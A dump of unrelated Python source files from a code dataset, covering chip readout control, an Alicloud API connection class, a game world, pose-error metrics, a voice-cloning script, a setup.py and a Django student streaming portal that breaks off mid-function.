retransmit bug in SPADIC 1.0 CBMnet:\n # Sometimes old register reads are retransmitted -> Clear\n # software read buffer before sending the read request to be\n # sure to get the newest value.\n self._ctrl_queue.clear(address)\n # End workaround\n addr = ftdi_cbmnet.ADDR_CTRL\n words = [RF_READ, address, 0]\n self._cbmif_write(addr, words)\n if not request_only:\n try:\n return self._ctrl_queue.get(address, timeout=1)\n except IOError:\n raise\n \n\n #----------------------------------------------------------------\n # send DLMs\n #----------------------------------------------------------------\n def send_dlm(self, number):\n \"\"\"Send a DLM.\"\"\"\n addr = ftdi_cbmnet.ADDR_DLM\n words = [number]\n self._cbmif_write(addr, words)\n\n def readout_enable(self, enable):\n \"\"\"Start or stop data taking in the chip.\"\"\"\n dlm = 8 if enable else 9\n self.send_dlm(dlm)\n \n\n #----------------------------------------------------------------\n # read messages from groups A and B\n #----------------------------------------------------------------\n def read_groupA(self, timeout=1, raw=False):\n \"\"\"Get one message from group A, if available.\"\"\"\n try:\n data = self._dataA_queue.get(timeout=timeout)\n except Queue.Empty:\n return None\n return (data if raw else Message(data))\n\n def read_groupB(self, timeout=1, raw=False):\n \"\"\"Get one message from group B, if available.\"\"\"\n try:\n data = self._dataB_queue.get(timeout=timeout)\n except Queue.Empty:\n return None\n return (data if raw else Message(data))\n\n","sub_path":"spadic/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"389755768","text":"# coding:utf-8\nimport sys\nimport time\n\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\"\"\"\nHandles basic connections to ACS\n\"\"\"\n\nimport footmark\nimport importlib\nfrom footmark.exception import FootmarkServerError\nfrom footmark.provider import Provider\nimport json\nimport yaml\nfrom footmark.resultset import ResultSet\n\nfrom pprint import pprint\n\nfrom aliyunsdkcore import client\nfrom aliyunsdkcore.acs_exception.exceptions import ServerException\n\n\nclass ACSAuthConnection(object):\n def __init__(self, acs_access_key_id=None, acs_secret_access_key=None,\n region=None, provider='acs', security_token=None, user_agent=None):\n \"\"\"\n :keyword str acs_access_key_id: Your ACS Access Key ID (provided by\n Alicloud). 
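The receive-worker pattern from spadic/main.py in miniature: a daemon thread drains a device and routes items into a queue that callers read with timeouts. Python 3 names are used here (the record itself is Python 2, hence its Queue module), and read_device is a hypothetical stand-in for _cbmif_read:

import threading, queue

def start_reader(read_device):
    out = queue.Queue()
    def job():
        while True:
            item = read_device()    # blocking read; None means nothing arrived
            if item is not None:
                out.put(item)
    threading.Thread(target=job, daemon=True).start()
    return out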
If none is specified, the value in your\n ``ACS_ACCESS_KEY_ID`` environmental variable is used.\n :keyword str acs_secret_access_key: Your ACS Secret Access Key\n (provided by Alicloud). If none is specified, the value in your\n ``ACS_SECRET_ACCESS_KEY`` environmental variable is used.\n :keyword str security_token: The security token associated with\n temporary credentials issued by STS. Optional unless using\n temporary credentials. If none is specified, the environment\n variable ``ACS_SECURITY_TOKEN`` is used if defined.\n\n :keyword str region: The region ID.\n\n \"\"\"\n self.region = region\n self.user_agent = user_agent\n if isinstance(provider, Provider):\n # Allow overriding Provider\n self.provider = provider\n else:\n self._provider_type = provider\n self.provider = Provider(self._provider_type,\n acs_access_key_id,\n acs_secret_access_key,\n security_token)\n\n def acs_access_key_id(self):\n return self.provider.access_key\n\n acs_access_key_id = property(acs_access_key_id)\n access_key = acs_access_key_id\n\n def acs_secret_access_key(self):\n return self.provider.secret_key\n\n acs_secret_access_key = property(acs_secret_access_key)\n secret_key = acs_secret_access_key\n\n def region_id(self):\n return self.region\n\n\nclass ACSQueryConnection(ACSAuthConnection):\n ResponseError = FootmarkServerError\n\n def __init__(self, acs_access_key_id=None, acs_secret_access_key=None, region=None,\n product=None, security_token=None, provider='acs',\n user_agent='Alicloud-Footmark-v'+footmark.__version__):\n\n super(ACSQueryConnection, self).__init__(\n acs_access_key_id,\n acs_secret_access_key,\n region=region,\n security_token=security_token,\n provider=provider,\n user_agent=user_agent)\n\n self.product = product\n self.user_agent = user_agent\n\n def make_request(self, action, params=None):\n conn = client.AcsClient(self.acs_access_key_id, self.acs_secret_access_key, self.region, user_agent=self.user_agent)\n if not conn:\n footmark.log.error('%s %s' % ('Null AcsClient ', conn))\n raise self.FootmarkClientError('Null AcsClient ', conn)\n\n timeout = 200\n delay = 3\n while timeout > 0:\n try:\n target = importlib.import_module(self.product + '.' 
+ action + 'Request')\n request = getattr(target, action + 'Request')()\n request.set_accept_format('json')\n if params and isinstance(params, dict):\n for k, v in params.items():\n if hasattr(request, k):\n getattr(request, k)(v)\n else:\n request.add_query_param(k[4:], v)\n return conn.do_action_with_exception(request)\n except Exception as e:\n if str(e.error_code) == \"SDK.ServerUnreachable\" \\\n or str(e.message).__contains__(\"SDK.ServerUnreachable\") \\\n or str(e.message).__contains__(\"Unable to connect server: timed out\"):\n time.sleep(delay)\n timeout -= delay\n continue\n raise e\n\n return None\n\n def build_list_params(self, params, items, label):\n if isinstance(items, str):\n items = str(items).strip()\n params['set_%s' % label] = items\n\n def parse_response(self, markers, body, connection):\n results = []\n body = yaml.safe_load(body)\n if not markers:\n markers = [\"\", ResultSet]\n\n result_set = ResultSet\n # For get_object\n if not markers[0] and markers[1] is not ResultSet:\n result_set = markers[1](connection)\n\n for key, value in body.items():\n self.parse_value(value)\n setattr(result_set, self.convert_name(key), value)\n\n if markers[0] and markers[0] in body:\n for value in getattr(result_set, self.convert_name(markers[0])).itervalues():\n if isinstance(value, list):\n for sub_value in value:\n element = markers[1](connection)\n for k, v in sub_value.items():\n setattr(element, k, v)\n results.append(element)\n elif isinstance(value, dict):\n element = markers[1](connection)\n for k, v in value.items():\n setattr(element, k, v)\n results.append(element)\n else:\n element = markers[1](connection)\n setattr(element, k, v)\n results.append(element)\n return results\n return result_set\n\n def parse_value(self, value):\n if isinstance(value, list):\n for item in value:\n self.parse_value(item)\n if isinstance(value, dict):\n for k, v in value.items():\n if isinstance(v, dict) or isinstance(v, list):\n self.parse_value(v)\n else:\n value.pop(k)\n value[self.convert_name(k)] = v\n for k, v in value.items():\n value.pop(k)\n value[self.convert_name(k)] = v\n # setattr(element, self.convert_name(key), value)\n return\n\n def convert_name(self, name):\n if name:\n new_name = ''\n tmp = ''\n for ch in name:\n if ch.isupper():\n tmp += ch\n continue\n if tmp:\n ch = '_' + tmp.lower() + ch\n tmp = ''\n new_name += ch\n if tmp:\n new_name += '_' + tmp.lower()\n if new_name.startswith('_'):\n new_name = new_name[1:]\n\n return new_name\n\n # generics\n def get_list(self, action, params, markers):\n try:\n body = self.make_request(action, params)\n footmark.log.debug('body= %s' % body)\n return self.parse_response(markers, body, self)\n except ServerException as e:\n footmark.log.error('%s' % e)\n raise self.ResponseError(e)\n except Exception as e:\n footmark.log.error('%s' % e)\n raise e\n\n def get_status(self, action, params):\n try:\n body = self.make_request(action, params)\n footmark.log.debug('body= %s' % body)\n body = json.loads(body, encoding='UTF-8')\n if body:\n return True\n return False\n except ServerException as e:\n footmark.log.error('%s' % e)\n raise e\n except Exception as e:\n footmark.log.error('%s' % e)\n raise e\n\n def get_object(self, action, params, obj):\n try:\n body = self.make_request(action, params)\n footmark.log.debug(body)\n markers = [\"\", obj]\n obj = self.parse_response(markers, body, self)\n if obj:\n return obj\n return None\n except ServerException as e:\n footmark.log.error('%s' % e)\n raise e\n except Exception as e:\n 
footmark.log.error('%s' % e)\n            raise e\n","sub_path":"footmark/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":8430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"628045165","text":"\nimport logging\nlog = logging.getLogger(__name__)\n\nimport os\nimport json\nimport time\n\nimport pygame\n\nimport euclid\nimport height_map\nimport entity\n\nimport components.ship\n\nclass World(object):\n\t\n\tdef __init__(self, directory):\n\t\t\n\t\tlog.info(\"Loading map from {0}\".format(directory))\n\t\tself.map_dir = directory\n\t\t\n\t\twith open(os.path.join(self.map_dir, \"map.json\"), \"r\") as fp:\n\t\t\tself.map_meta = json.load(fp)\n\t\t\t\t\n\t\tself.size = euclid.Vector3(*self.map_meta[\"size\"])\n\t\tself.sealevel = self.map_meta[\"sealevel\"]\n\t\tself.height_map = height_map.HeightMap(\n\t\t\t\t\t\t\t\tself.size,\n\t\t\t\t\t\t\t\tos.path.join(self.map_dir, self.map_meta[\"heightmap\"]),\n\t\t\t\t\t\t\t\t)\n\t\t\n\t\tself.entities = {}\n\t\t\n\t@property\n\tdef terrain_path(self):\n\t\treturn os.path.join(self.map_dir, \"terrain.png\")\n\t\n\tdef __repr__(self):\n\t\treturn \"{klass}(size=({size}), sealevel={sealevel}, {hmap}, nents={nents})\".format(\n\t\t\t\t\t\t\t\tklass=self.__class__.__name__,\n\t\t\t\t\t\t\t\tdir=self.map_dir,\n\t\t\t\t\t\t\t\tsize=\", \".join([str(i) for i in self.size]),\n\t\t\t\t\t\t\t\tsealevel=self.sealevel,\n\t\t\t\t\t\t\t\thmap=self.height_map,\n\t\t\t\t\t\t\t\tnents=len(self.entities)\n\t\t\t\t\t\t\t\t)\n\t\nclass ServerWorld(World):\n\t\n\tdef __init__(self, directory):\n\t\tWorld.__init__(self, directory)\n\t\t\n\t\tself.clock = pygame.time.Clock()\n\t\tself.t_accum = 0.0\n\t\tself.rate = 30.0\n\t\t\n\t\tself.entities = {}\n\t\tself._current_id = -1\n\t\t\n\t\tfor ship_def in self.map_meta.get(\"ships\", []):\n\t\t\tself.spawn_entity(**{\"components\": {components.ship.Ship: ship_def}})\n\t\t\t\n\t@property\n\tdef t_step(self):\n\t\treturn 1 / float(self.rate)\n\t\n\tdef next_id(self):\n\t\tself._current_id += 1\n\t\treturn self._current_id\n\t\n\tdef spawn_entity(self, **kwargs):\n\t\tent = entity.Entity(self, self.next_id(), **kwargs)\n\t\tself.entities[ent.id] = ent\n\t\tlog.debug(\"New entity {}; {}\".format(ent.id, \", \".join(c.__class__.__name__ for c in ent)))\n\t\treturn ent\n\t\n\tdef update(self):\n\t\t\n\t\tself.t_accum += self.clock.tick() / 1000.0\n\t\twhile self.t_accum >= self.t_step:\n\t\t\t\n\t\t\tfor ent in self.entities.itervalues():\n\t\t\t\tent.update(self.t_step)\n\t\t\t\t\n\t\t\tself.t_accum -= self.t_step\n\nclass ClientWorld(World):\n\t\n\tdef update(self, client):\n\n\t\tfor es in client.recv_entity_update(32):\n\t\t\tent = entity.Entity.from_state(self, es)\n\t\t\tself.entities[ent.id] = ent\n\n\n\t\t\t\n","sub_path":"world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"87568648","text":"#fourierAnalysis\n\nimport pandas as pd\nimport scipy as sp\nimport numpy as np\nimport math\n\n#find alpha(h), the Fourier alpha coefficient for the hth harmonic\ndef alphaH(y,t,N,h):\n    sumContainer = []\n    for point in range(0,N):\n        sumContainer.append(y[point]*math.cos(2*math.pi*h*t[point]/float(N)))\n    return 2/float(N)*sum(sumContainer)\n\n#find beta(h), the Fourier beta coefficient for the hth harmonic\ndef betaH(y,t,N,h):\n    sumContainer = []\n    for point in range(0,N):\n        
sumContainer.append(y[point]*math.sin(2*math.pi*h*t[point]/float(N)))\n    return 2/float(N)*sum(sumContainer)\n\n\n#import the metadata\nmetadata = pd.read_csv(\"Data/aarhus/trafficMetaData.csv\")\n\nranges = [\"traffic_feb_june\",\"traffic_june_sep\",\"traffic_oct_nov\"]\n\n#load all of the data up.\ndata = []\nfor dateRange in range(len(ranges)):\n    data.append([])\n    for id in range(0, len(metadata.iloc[:,20])):\n        reportid = str(metadata.iloc[id,20])\n        data[dateRange].append(pd.read_csv(\"Data/aarhus/\"+ranges[dateRange]+\"/trafficData\"+reportid+\".csv\"))\n","sub_path":"fourierAnalysis.py","file_name":"fourierAnalysis.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"38607715","text":"import numpy as np\nimport transforms3d as tf3d\nimport copy\nimport math\n\n\nADD_CODE = 'ADD'\nADDS_CODE = 'ADDS'\nTRANSLATION_CODE = 'TR'\nROTATION_CODE = 'ROT'\nROTATION_X_CODE = 'ROT_X'\nROTATION_Y_CODE = 'ROT_Y'\nROTATION_Z_CODE = 'ROT_Z'\n\n\ndef to_rotation_matrix(vec6):\n    z_axis = copy.deepcopy(vec6[0:3])\n    z_axis /= np.linalg.norm(z_axis)\n    y_axis = copy.deepcopy(vec6[3:6])\n    y_axis = y_axis - np.dot(z_axis, y_axis) * z_axis\n    y_axis /= np.linalg.norm(y_axis)\n    x_axis = np.cross(y_axis, z_axis)\n    rot = np.eye(3)\n    rot[:, 0] = x_axis\n    rot[:, 1] = y_axis\n    rot[:, 2] = z_axis\n\n    return rot\n\n\ndef to_transform(vec9, offset, dist):\n    translation = copy.deepcopy(vec9[0:3])\n    translation *= dist\n    translation += offset.flatten()\n    rot = to_rotation_matrix(vec9[3:9])\n\n    transform = np.eye(4)\n    transform[:3, :3] = rot\n    transform[:3, 3] = translation\n\n    return transform\n\n\ndef to_transform_batch(vecvec9, offsets, dists):\n    transforms = []\n    for i in range(len(vecvec9)):\n        transforms.append(to_transform(vecvec9[i], offsets[i], dists[i]))\n    return transforms\n\n\ndef translation_error(gt_pose, est_pose):\n    return np.linalg.norm(gt_pose[:3, 3] - est_pose[:3, 3])\n\n\ndef rotation_error(gt_pose, est_pose):\n    est_pose_new = copy.deepcopy(est_pose)\n    rot_diff = np.degrees(\n        np.array(tf3d.euler.mat2euler(np.matmul(np.linalg.inv(gt_pose[:3, :3]), est_pose_new[:3, :3]), 'szyx')))\n    if np.abs(rot_diff[0]) > 90:\n        est_pose_new[:3, 0] *= -1\n        est_pose_new[:3, 1] *= -1\n        rot_diff = np.array(\n            tf3d.euler.mat2euler(np.matmul(np.linalg.inv(gt_pose[:3, :3]), est_pose_new[:3, :3]), 'szyx'))\n    else:\n        rot_diff = np.radians(rot_diff)\n\n    # Compute cosine of error\n    error_cos = float(0.5 * (np.trace(est_pose_new[:3, :3].dot(np.linalg.inv(gt_pose[:3, :3]))) - 1.0))\n\n    # Avoid invalid values due to numerical errors.\n    error_cos = min(1.0, max(-1.0, error_cos))\n\n    error = math.acos(error_cos)\n\n    return error, rot_diff[2], rot_diff[1], rot_diff[0]\n\n\ndef add_error(gt_pose, est_pose, pts):\n    gt_pts = copy.deepcopy(pts)\n    gt_pts = np.matmul(gt_pts, np.linalg.inv(gt_pose[:3, :3]))\n    gt_pts += gt_pose[:3, 3]\n\n    est_pts = copy.deepcopy(pts)\n    est_pts = np.matmul(est_pts, np.linalg.inv(est_pose[:3, :3]))\n    est_pts += est_pose[:3, 3]\n\n    error = np.linalg.norm(est_pts - gt_pts, axis=1).mean()\n\n    return error\n\n\ndef add_symmetric_error(gt_pose, est_pose, pts):\n    error_1 = add_error(gt_pose, est_pose, pts)\n\n    est_pose_rot_z = copy.deepcopy(est_pose)\n    est_pose_rot_z[:3, 0] *= -1\n    est_pose_rot_z[:3, 1] *= -1\n    error_2 = add_error(gt_pose, est_pose_rot_z, pts)\n\n    return min(error_1, error_2)\n\n\ndef get_all_errors(gt_pose, est_pose, pts, error_dict):\n    add = add_error(gt_pose, est_pose, pts)\n    add_s = 
add_symmetric_error(gt_pose, est_pose, pts)\n t = translation_error(gt_pose, est_pose)\n r = rotation_error(gt_pose, est_pose)\n\n result_dict = {}\n for key in error_dict:\n if key == ADD_CODE:\n result_dict[ADD_CODE] = add\n elif key == ADDS_CODE:\n result_dict[ADDS_CODE] = add_s\n elif key == TRANSLATION_CODE:\n result_dict[TRANSLATION_CODE] = t\n elif key == ROTATION_CODE:\n result_dict[ROTATION_CODE] = r[0]\n elif key == ROTATION_X_CODE:\n result_dict[ROTATION_X_CODE] = r[1]\n elif key == ROTATION_Y_CODE:\n result_dict[ROTATION_Y_CODE] = r[2]\n elif key == ROTATION_Z_CODE:\n result_dict[ROTATION_Z_CODE] = r[3]\n\n return result_dict\n\n\ndef get_all_errors_batch(gt_poses, est_poses, pts, error_dict):\n results_dict = {}\n for key in error_dict:\n results_dict[key] = []\n for i in range(len(gt_poses)):\n errors = get_all_errors(gt_poses[i], est_poses[i], pts, error_dict)\n for key in error_dict:\n results_dict[key].append(errors[key])\n return results_dict\n\n\ndef eval_grasps(error_dict, add_th=None, adds_th=None, tr_th=None):\n add_eval = (0., 0)\n adds_eval = (0., 0)\n tr_eval = (0., 0)\n trxyz_eval = (0., 0)\n\n if add_th is not None and ADD_CODE in error_dict.keys():\n add_eval = eval_add_adds(error_dict[ADD_CODE], add_th)\n\n if adds_th is not None and ADDS_CODE in error_dict.keys():\n adds_eval = eval_add_adds(error_dict[ADDS_CODE], adds_th)\n\n if tr_th is not None:\n if TRANSLATION_CODE in error_dict.keys():\n t_e = error_dict[TRANSLATION_CODE]\n r_e = []\n r_e_x = []\n r_e_y = []\n r_e_z = []\n if ROTATION_CODE in error_dict.keys():\n r_e = error_dict[ROTATION_CODE]\n if ROTATION_X_CODE in error_dict.keys() and \\\n ROTATION_Y_CODE in error_dict.keys() and ROTATION_Z_CODE in error_dict.keys():\n r_e_x = error_dict[ROTATION_X_CODE]\n r_e_y = error_dict[ROTATION_Y_CODE]\n r_e_z = error_dict[ROTATION_Z_CODE]\n tr_eval, trxyz_eval = eval_translation_rotation(t_e, r_e, r_e_x, r_e_y, r_e_z, tr_th[0], tr_th[1])\n\n return add_eval, adds_eval, tr_eval, trxyz_eval\n\n\ndef eval_add_adds(errors, threshold):\n num_correct = 0\n for e in errors:\n if e <= threshold:\n num_correct += 1\n return float(num_correct) / float(len(errors)), num_correct\n\n\ndef eval_translation_rotation(t_errors, r_errors, r_x_errors, r_y_errors, r_z_errors, t_threshold, r_threshold):\n if len(r_errors) > 0:\n num_correct = 0\n for i in range(len(t_errors)):\n if t_errors[i] <= t_threshold and r_errors[i] <= r_threshold:\n num_correct += 1\n tr_eval = float(num_correct) / float(len(t_errors)), num_correct\n else:\n tr_eval = 0., 0\n\n if len(r_x_errors) > 0 and len(r_y_errors) > 0 and len(r_z_errors) > 0:\n num_correct = 0\n xx = []\n yy = []\n zz = []\n for i in range(len(t_errors)):\n # y should be symmetric\n xx.append(np.degrees(r_x_errors[i]))\n yy.append(np.degrees(r_y_errors[i]))\n zz.append(np.degrees(r_z_errors[i]))\n if t_errors[i] <= t_threshold and r_x_errors[i] <= r_threshold and r_y_errors[i] <= r_threshold and \\\n r_z_errors[i] <= r_threshold:\n num_correct += 1\n trxyz_eval = float(num_correct) / float(len(t_errors)), num_correct\n else:\n trxyz_eval = 0., 0\n\n return tr_eval, trxyz_eval\n","sub_path":"utils/error_def.py","file_name":"error_def.py","file_ext":"py","file_size_in_byte":6504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"119421171","text":"#string = input('Строка: ')\n\n#for letter in string:\n# print(letter)\n\ndef average(scores):\n return sum(scores) / len(scores)\n\nclasses = [\n {'school_class': '4a', 'scores': 
[3,4,4,5,2]},\n    {'school_class': '7б', 'scores': [5,4,5,5,3,2,2]},\n    {'school_class': '10а', 'scores': [5,5,5,5,5]},\n    {'school_class': '9в', 'scores': [3,4,4]},\n    {'school_class': '6б', 'scores': [3,4,4,5,2]}\n]\n\nall_marks = []\nfor index in classes:\n    all_marks.extend(index['scores'])\n    avg = average(index['scores'])\n    print('Average score in class ' + index['school_class'] + ': ' + str(avg))\n\nprint('\\nAverage score for the whole school: ' + str(average(all_marks)))\n\n#print(classes[0]['school_class'])\n#print(average([2, 3, 4]))","sub_path":"for_task.py","file_name":"for_task.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"624160987","text":"from textHelpers import get_hansard, text_operations\nfrom cloner import VoiceCloner\nimport librosa\nimport numpy as np\n\nimport os\n\nDATE = \"2020-04-22\"\nvc = VoiceCloner()\n\n\ndef chunks(arr, n):\n    n = max(1, n)\n    return (arr[i:i+n] for i in range(0, len(arr), n))\n\n\nstatements = get_hansard.GetHansard(date=DATE, members=[4007, 4514])\nchanged_statements = text_operations.replace_words(statements)\n\nif not os.path.exists(\"output/\" + DATE):\n    os.mkdir(\"output/\" + DATE)\n\nfile_no = 0\nfor statement in changed_statements:\n    if os.path.exists(\"reference_audio/%s.wav\" % statement[0]):\n        words = statement[1].split(\" \")\n        wavs = []\n        word_chunks = chunks(words, 25)\n        last_chunk = \"\"\n        for chunk in word_chunks:\n            if len(chunk) < 15:\n                chunk = last_chunk + chunk\n                wavs.pop()\n            chunk_text = \" \".join(chunk)\n            new_wav = vc.gen_audio(\"reference_audio/%s.wav\" % statement[0], chunk_text)\n            wavs.append(new_wav)\n            last_chunk = chunk\n        fpath = \"output/%s/output_%02d.wav\" % (DATE, file_no)\n        file_no += 1\n        generated_wav = np.concatenate(wavs)\n        librosa.output.write_wav(fpath, generated_wav.astype(np.float32), vc.synthesizer.sample_rate)\n        print(\"\\nSaved output as %s\\n\\n\" % fpath)\n\n\n","sub_path":"hansard_replace.py","file_name":"hansard_replace.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"399137182","text":"# -*- coding: utf-8 -*-\n# @Author: Shuang0420\n# @Date: 2017-12-12 11:47:28\n# @Last Modified by: Shuang0420\n# @Last Modified time: 2017-12-12 11:47:28\n\n'''\nBuild the DeepQA Chinese version package\n'''\n\nfrom setuptools import setup, find_packages\n\nVERSION = \"0.1.0\"\n\nsetup_args = dict( name=\"deepqa\",\n                   version=VERSION,\n                   author=\"Shuang0420\",\n                   author_email=\"sxu1@alumni.cmu.edu\",\n\n                   description=\"Deep QA\",\n                   long_description=\"\"\"DeepQA which supports Chinese dataset\"\"\",\n                   url=\"https://github.com/Shuang0420/Dual-LSTM-Encoder-Rank-Model.git\",\n                   platforms=[\"any\"],\n                   classifiers=[\"Development Status :: 1 - Beta\",\n                                \"Environment :: Console\",\n                                \"Intended Audience :: Developers\",\n                                \"Programming Language :: Python\",\n                                \"Programming Language :: Python :: 3\",\n                                \"Programming Language :: Python :: 3.4\",\n                                \"Programming Language :: Python :: 3.5\",\n                                \"Programming Language :: Python :: 3.6\",\n                                \"License :: OSI Approved :: BSD License\",\n                                \"Operating System :: OS Independent\",\n                                \"Topic :: Communications :: Chat\",\n                                \"Topic :: Scientific/Engineering :: Artificial Intelligence\"\n                                ],\n\n                   install_requires = [ 'setuptools',\n                                      ],\n\n                   packages = find_packages(),\n\n                   include_package_data = False, # otherwise package_data is not used\n                 )\n\nif __name__ == '__main__':\n    setup( **setup_args 
)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"330056061","text":"\n\n#calss header\nclass _MOCKING():\n\tdef __init__(self,): \n\t\tself.name = \"MOCKING\"\n\t\tself.definitions = [u'mocking behaviour involves laughing at someone or something in an unkind way: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_mocking.py","file_name":"_mocking.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"505717533","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.core.urlresolvers import reverse\nfrom django.http import Http404\nfrom django.http.response import HttpResponse\nfrom django.db.models import Q\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.utils.crypto import get_random_string\nfrom forms import *\n\ndef home(request):\n context = {}\n if request.user.is_authenticated():\n if hasattr(request.user, 'admin_school'):\n context['school'] = request.user.admin_school.name\n context['professors'] = Professor.objects.filter(\n school=request.user.admin_school, is_active=True)\n context['professors_awaiting_approval'] = Professor.objects.filter(\n school=request.user.admin_school, is_active=False)\n context['recommendations'] = (CourseRecommendation.objects\n .filter(school=request.user.admin_school)\n .order_by('-num_recommendations'))\n return render(request, 'portal/school_admin_index.html', context)\n elif hasattr(request.user, 'professor'):\n context['school'] = request.user.professor.school.name\n context['courses'] = Course.objects.filter(\n professor=request.user.professor)\n return render(request, 'portal/professor_index.html', context)\n elif hasattr(request.user, 'student'):\n context['school'] = request.user.student.school.name\n streams = Stream.objects.filter(\n is_active=True, course__school=request.user.student.school)\n streams = streams.filter(\n Q(course__roster__in=[request.user.student])\n | Q(course__roster=None))\n subscription_streams = Stream.objects.filter(\n is_active=True, course__school=request.user.student.school,\n course__in=request.user.student.subscriptions.all())\n context['streams'] = streams\n context['subscription_streams'] = subscription_streams\n return render(request, 'portal/index.html', context)\n else:\n context['signup_form'] = SignupForm()\n context['login_form'] = LoginForm()\n return render(request, 'portal/landing_page.html', context)\n\ndef about(request):\n context = {}\n return render(request, 'portal/about.html', context)\n\ndef contact(request):\n context = {}\n return render(request, 'portal/contact.html', context)\n \ndef signup(request):\n if request.method == 'POST':\n context = {}\n form = SignupForm(request.POST)\n if not form.is_valid():\n context['signup_form'] = form\n context['login_form'] = LoginForm()\n return render(request, 'portal/landing_page.html', context)\n cd = form.cleaned_data\n user = form.save()\n school = School.objects.get(email_handle=cd['username'].split('@')[1])\n if cd['is_professor']:\n professor = Professor(user=user, 
school=school, is_active=False)\n professor.save()\n context['signup_form'] = SignupForm()\n context['login_form'] = LoginForm()\n context['professor_signed_up'] = True\n return render(request, 'portal/landing_page.html', context)\n else:\n student = Student(user=user, school=school)\n student.save()\n login_user = authenticate(username=cd['username'],\n password=cd['password1'])\n login(request, login_user)\n return redirect(reverse('home'))\n else:\n raise Http404\n\ndef login_path(request):\n if request.method == 'POST':\n context = {}\n form = LoginForm(request.POST)\n if not form.is_valid():\n context['signup_form'] = SignupForm()\n context['login_form'] = form\n return render(request, 'portal/landing_page.html', context) \n user = authenticate(username=form.cleaned_data['email'],\n password=form.cleaned_data['password'])\n if user is None:\n context['no_user_found'] = True\n context['signup_form'] = SignupForm()\n context['login_form'] = form\n return render(request, 'portal/landing_page.html', context)\n elif hasattr(user, 'professor') and not user.professor.is_active:\n context['professor_inactive'] = True\n context['signup_form'] = SignupForm()\n context['login_form'] = form\n return render(request, 'portal/landing_page.html', context)\n else:\n login(request, user)\n return redirect(reverse('home'))\n else:\n raise Http404\n\ndef logout_path(request):\n logout(request)\n return redirect(reverse('home'))\n\ndef stream(request):\n if request.user.is_authenticated():\n context = {}\n context['courses'] = request.user.student.ta_courses.all()\n return render(request, 'portal/stream.html', context)\n else:\n raise Http404\n\ndef stream_course(request, course_id):\n if request.user.is_authenticated():\n context = {}\n course = get_object_or_404(Course, pk=course_id)\n student = request.user.student\n if course not in student.ta_courses.all():\n raise Http404\n if (Stream.objects.filter(\n is_active=True, course=course, streamer=student).first()):\n raise Http404\n key = get_random_string(length=32)\n while Stream.objects.filter(stream_key=key).first() is not None:\n key = get_random_string(length=32)\n stream = Stream(\n course=course, streamer=student, is_active=True,\n stream_key=key)\n stream.save()\n context['stream'] = stream\n return render(request, 'portal/stream_course.html', context)\n else:\n raise Http404\n\ndef view_stream(request, stream_id):\n if request.user.is_authenticated():\n context = {}\n stream = get_object_or_404(Stream, pk=stream_id)\n if stream.course.school != request.user.student.school:\n raise Http404\n if not stream.is_active:\n return redirect(reverse('home'))\n context['stream'] = stream\n return render(request, 'portal/view_course.html', context)\n else:\n raise Http404\n\ndef end_stream(request, stream_id):\n if request.user.is_authenticated():\n context = {}\n stream = get_object_or_404(Stream, pk=stream_id)\n if stream.streamer != request.user.student:\n raise Http404\n stream.is_active = False\n stream.save()\n return HttpResponse('')\n else:\n raise Http404\n\ndef activate_professor(request, professor_id):\n professor = get_object_or_404(Professor, pk=professor_id)\n if (request.user.is_authenticated()\n and professor.school == request.user.admin_school):\n context = {}\n professor.is_active = True\n professor.save()\n context['notification'] = (\n \"Professor account for %s has been activated.\" \n % professor.user.username)\n context['professors'] = Professor.objects.filter(\n school=request.user.admin_school, is_active=True)\n 
context['professors_awaiting_approval'] = Professor.objects.filter(\n            school=request.user.admin_school, is_active=False)\n        return render(request, 'portal/school_admin_index.html', context)\n    else:\n        raise Http404\n\ndef delete_professor(request, professor_id):\n    professor = get_object_or_404(Professor, pk=professor_id)\n    if (request.user.is_authenticated()\n            and professor.school == request.user.admin_school):\n        context = {}\n        context['notification'] = (\n            \"Professor account for %s has been deleted.\" \n            % professor.user.username)\n        professor.delete()\n        context['professors'] = Professor.objects.filter(\n            school=request.user.admin_school, is_active=True)\n        context['professors_awaiting_approval'] = Professor.objects.filter(\n            school=request.user.admin_school, is_active=False)\n        return render(request, 'portal/school_admin_index.html', context)\n    else:\n        raise Http404\n\ndef add_course(request):\n    context = {}\n    if (request.user.is_authenticated() and hasattr(request.user, 'professor')):\n        if request.method == 'GET':\n            form = CourseForm()\n            form.fields['tas'].queryset = (\n                Student.objects.filter(school=request.user.professor.school)) \n            form.fields['roster'].queryset = (\n                Student.objects.filter(school=request.user.professor.school)) \n            context['form'] = form\n            return render(request, 'portal/add_course.html', context)\n        elif request.method == 'POST':\n            form = CourseForm(request.POST)\n            form.fields['tas'].queryset = (\n                Student.objects.filter(school=request.user.professor.school)) \n            form.fields['roster'].queryset = (\n                Student.objects.filter(school=request.user.professor.school)) \n            if not form.is_valid():\n                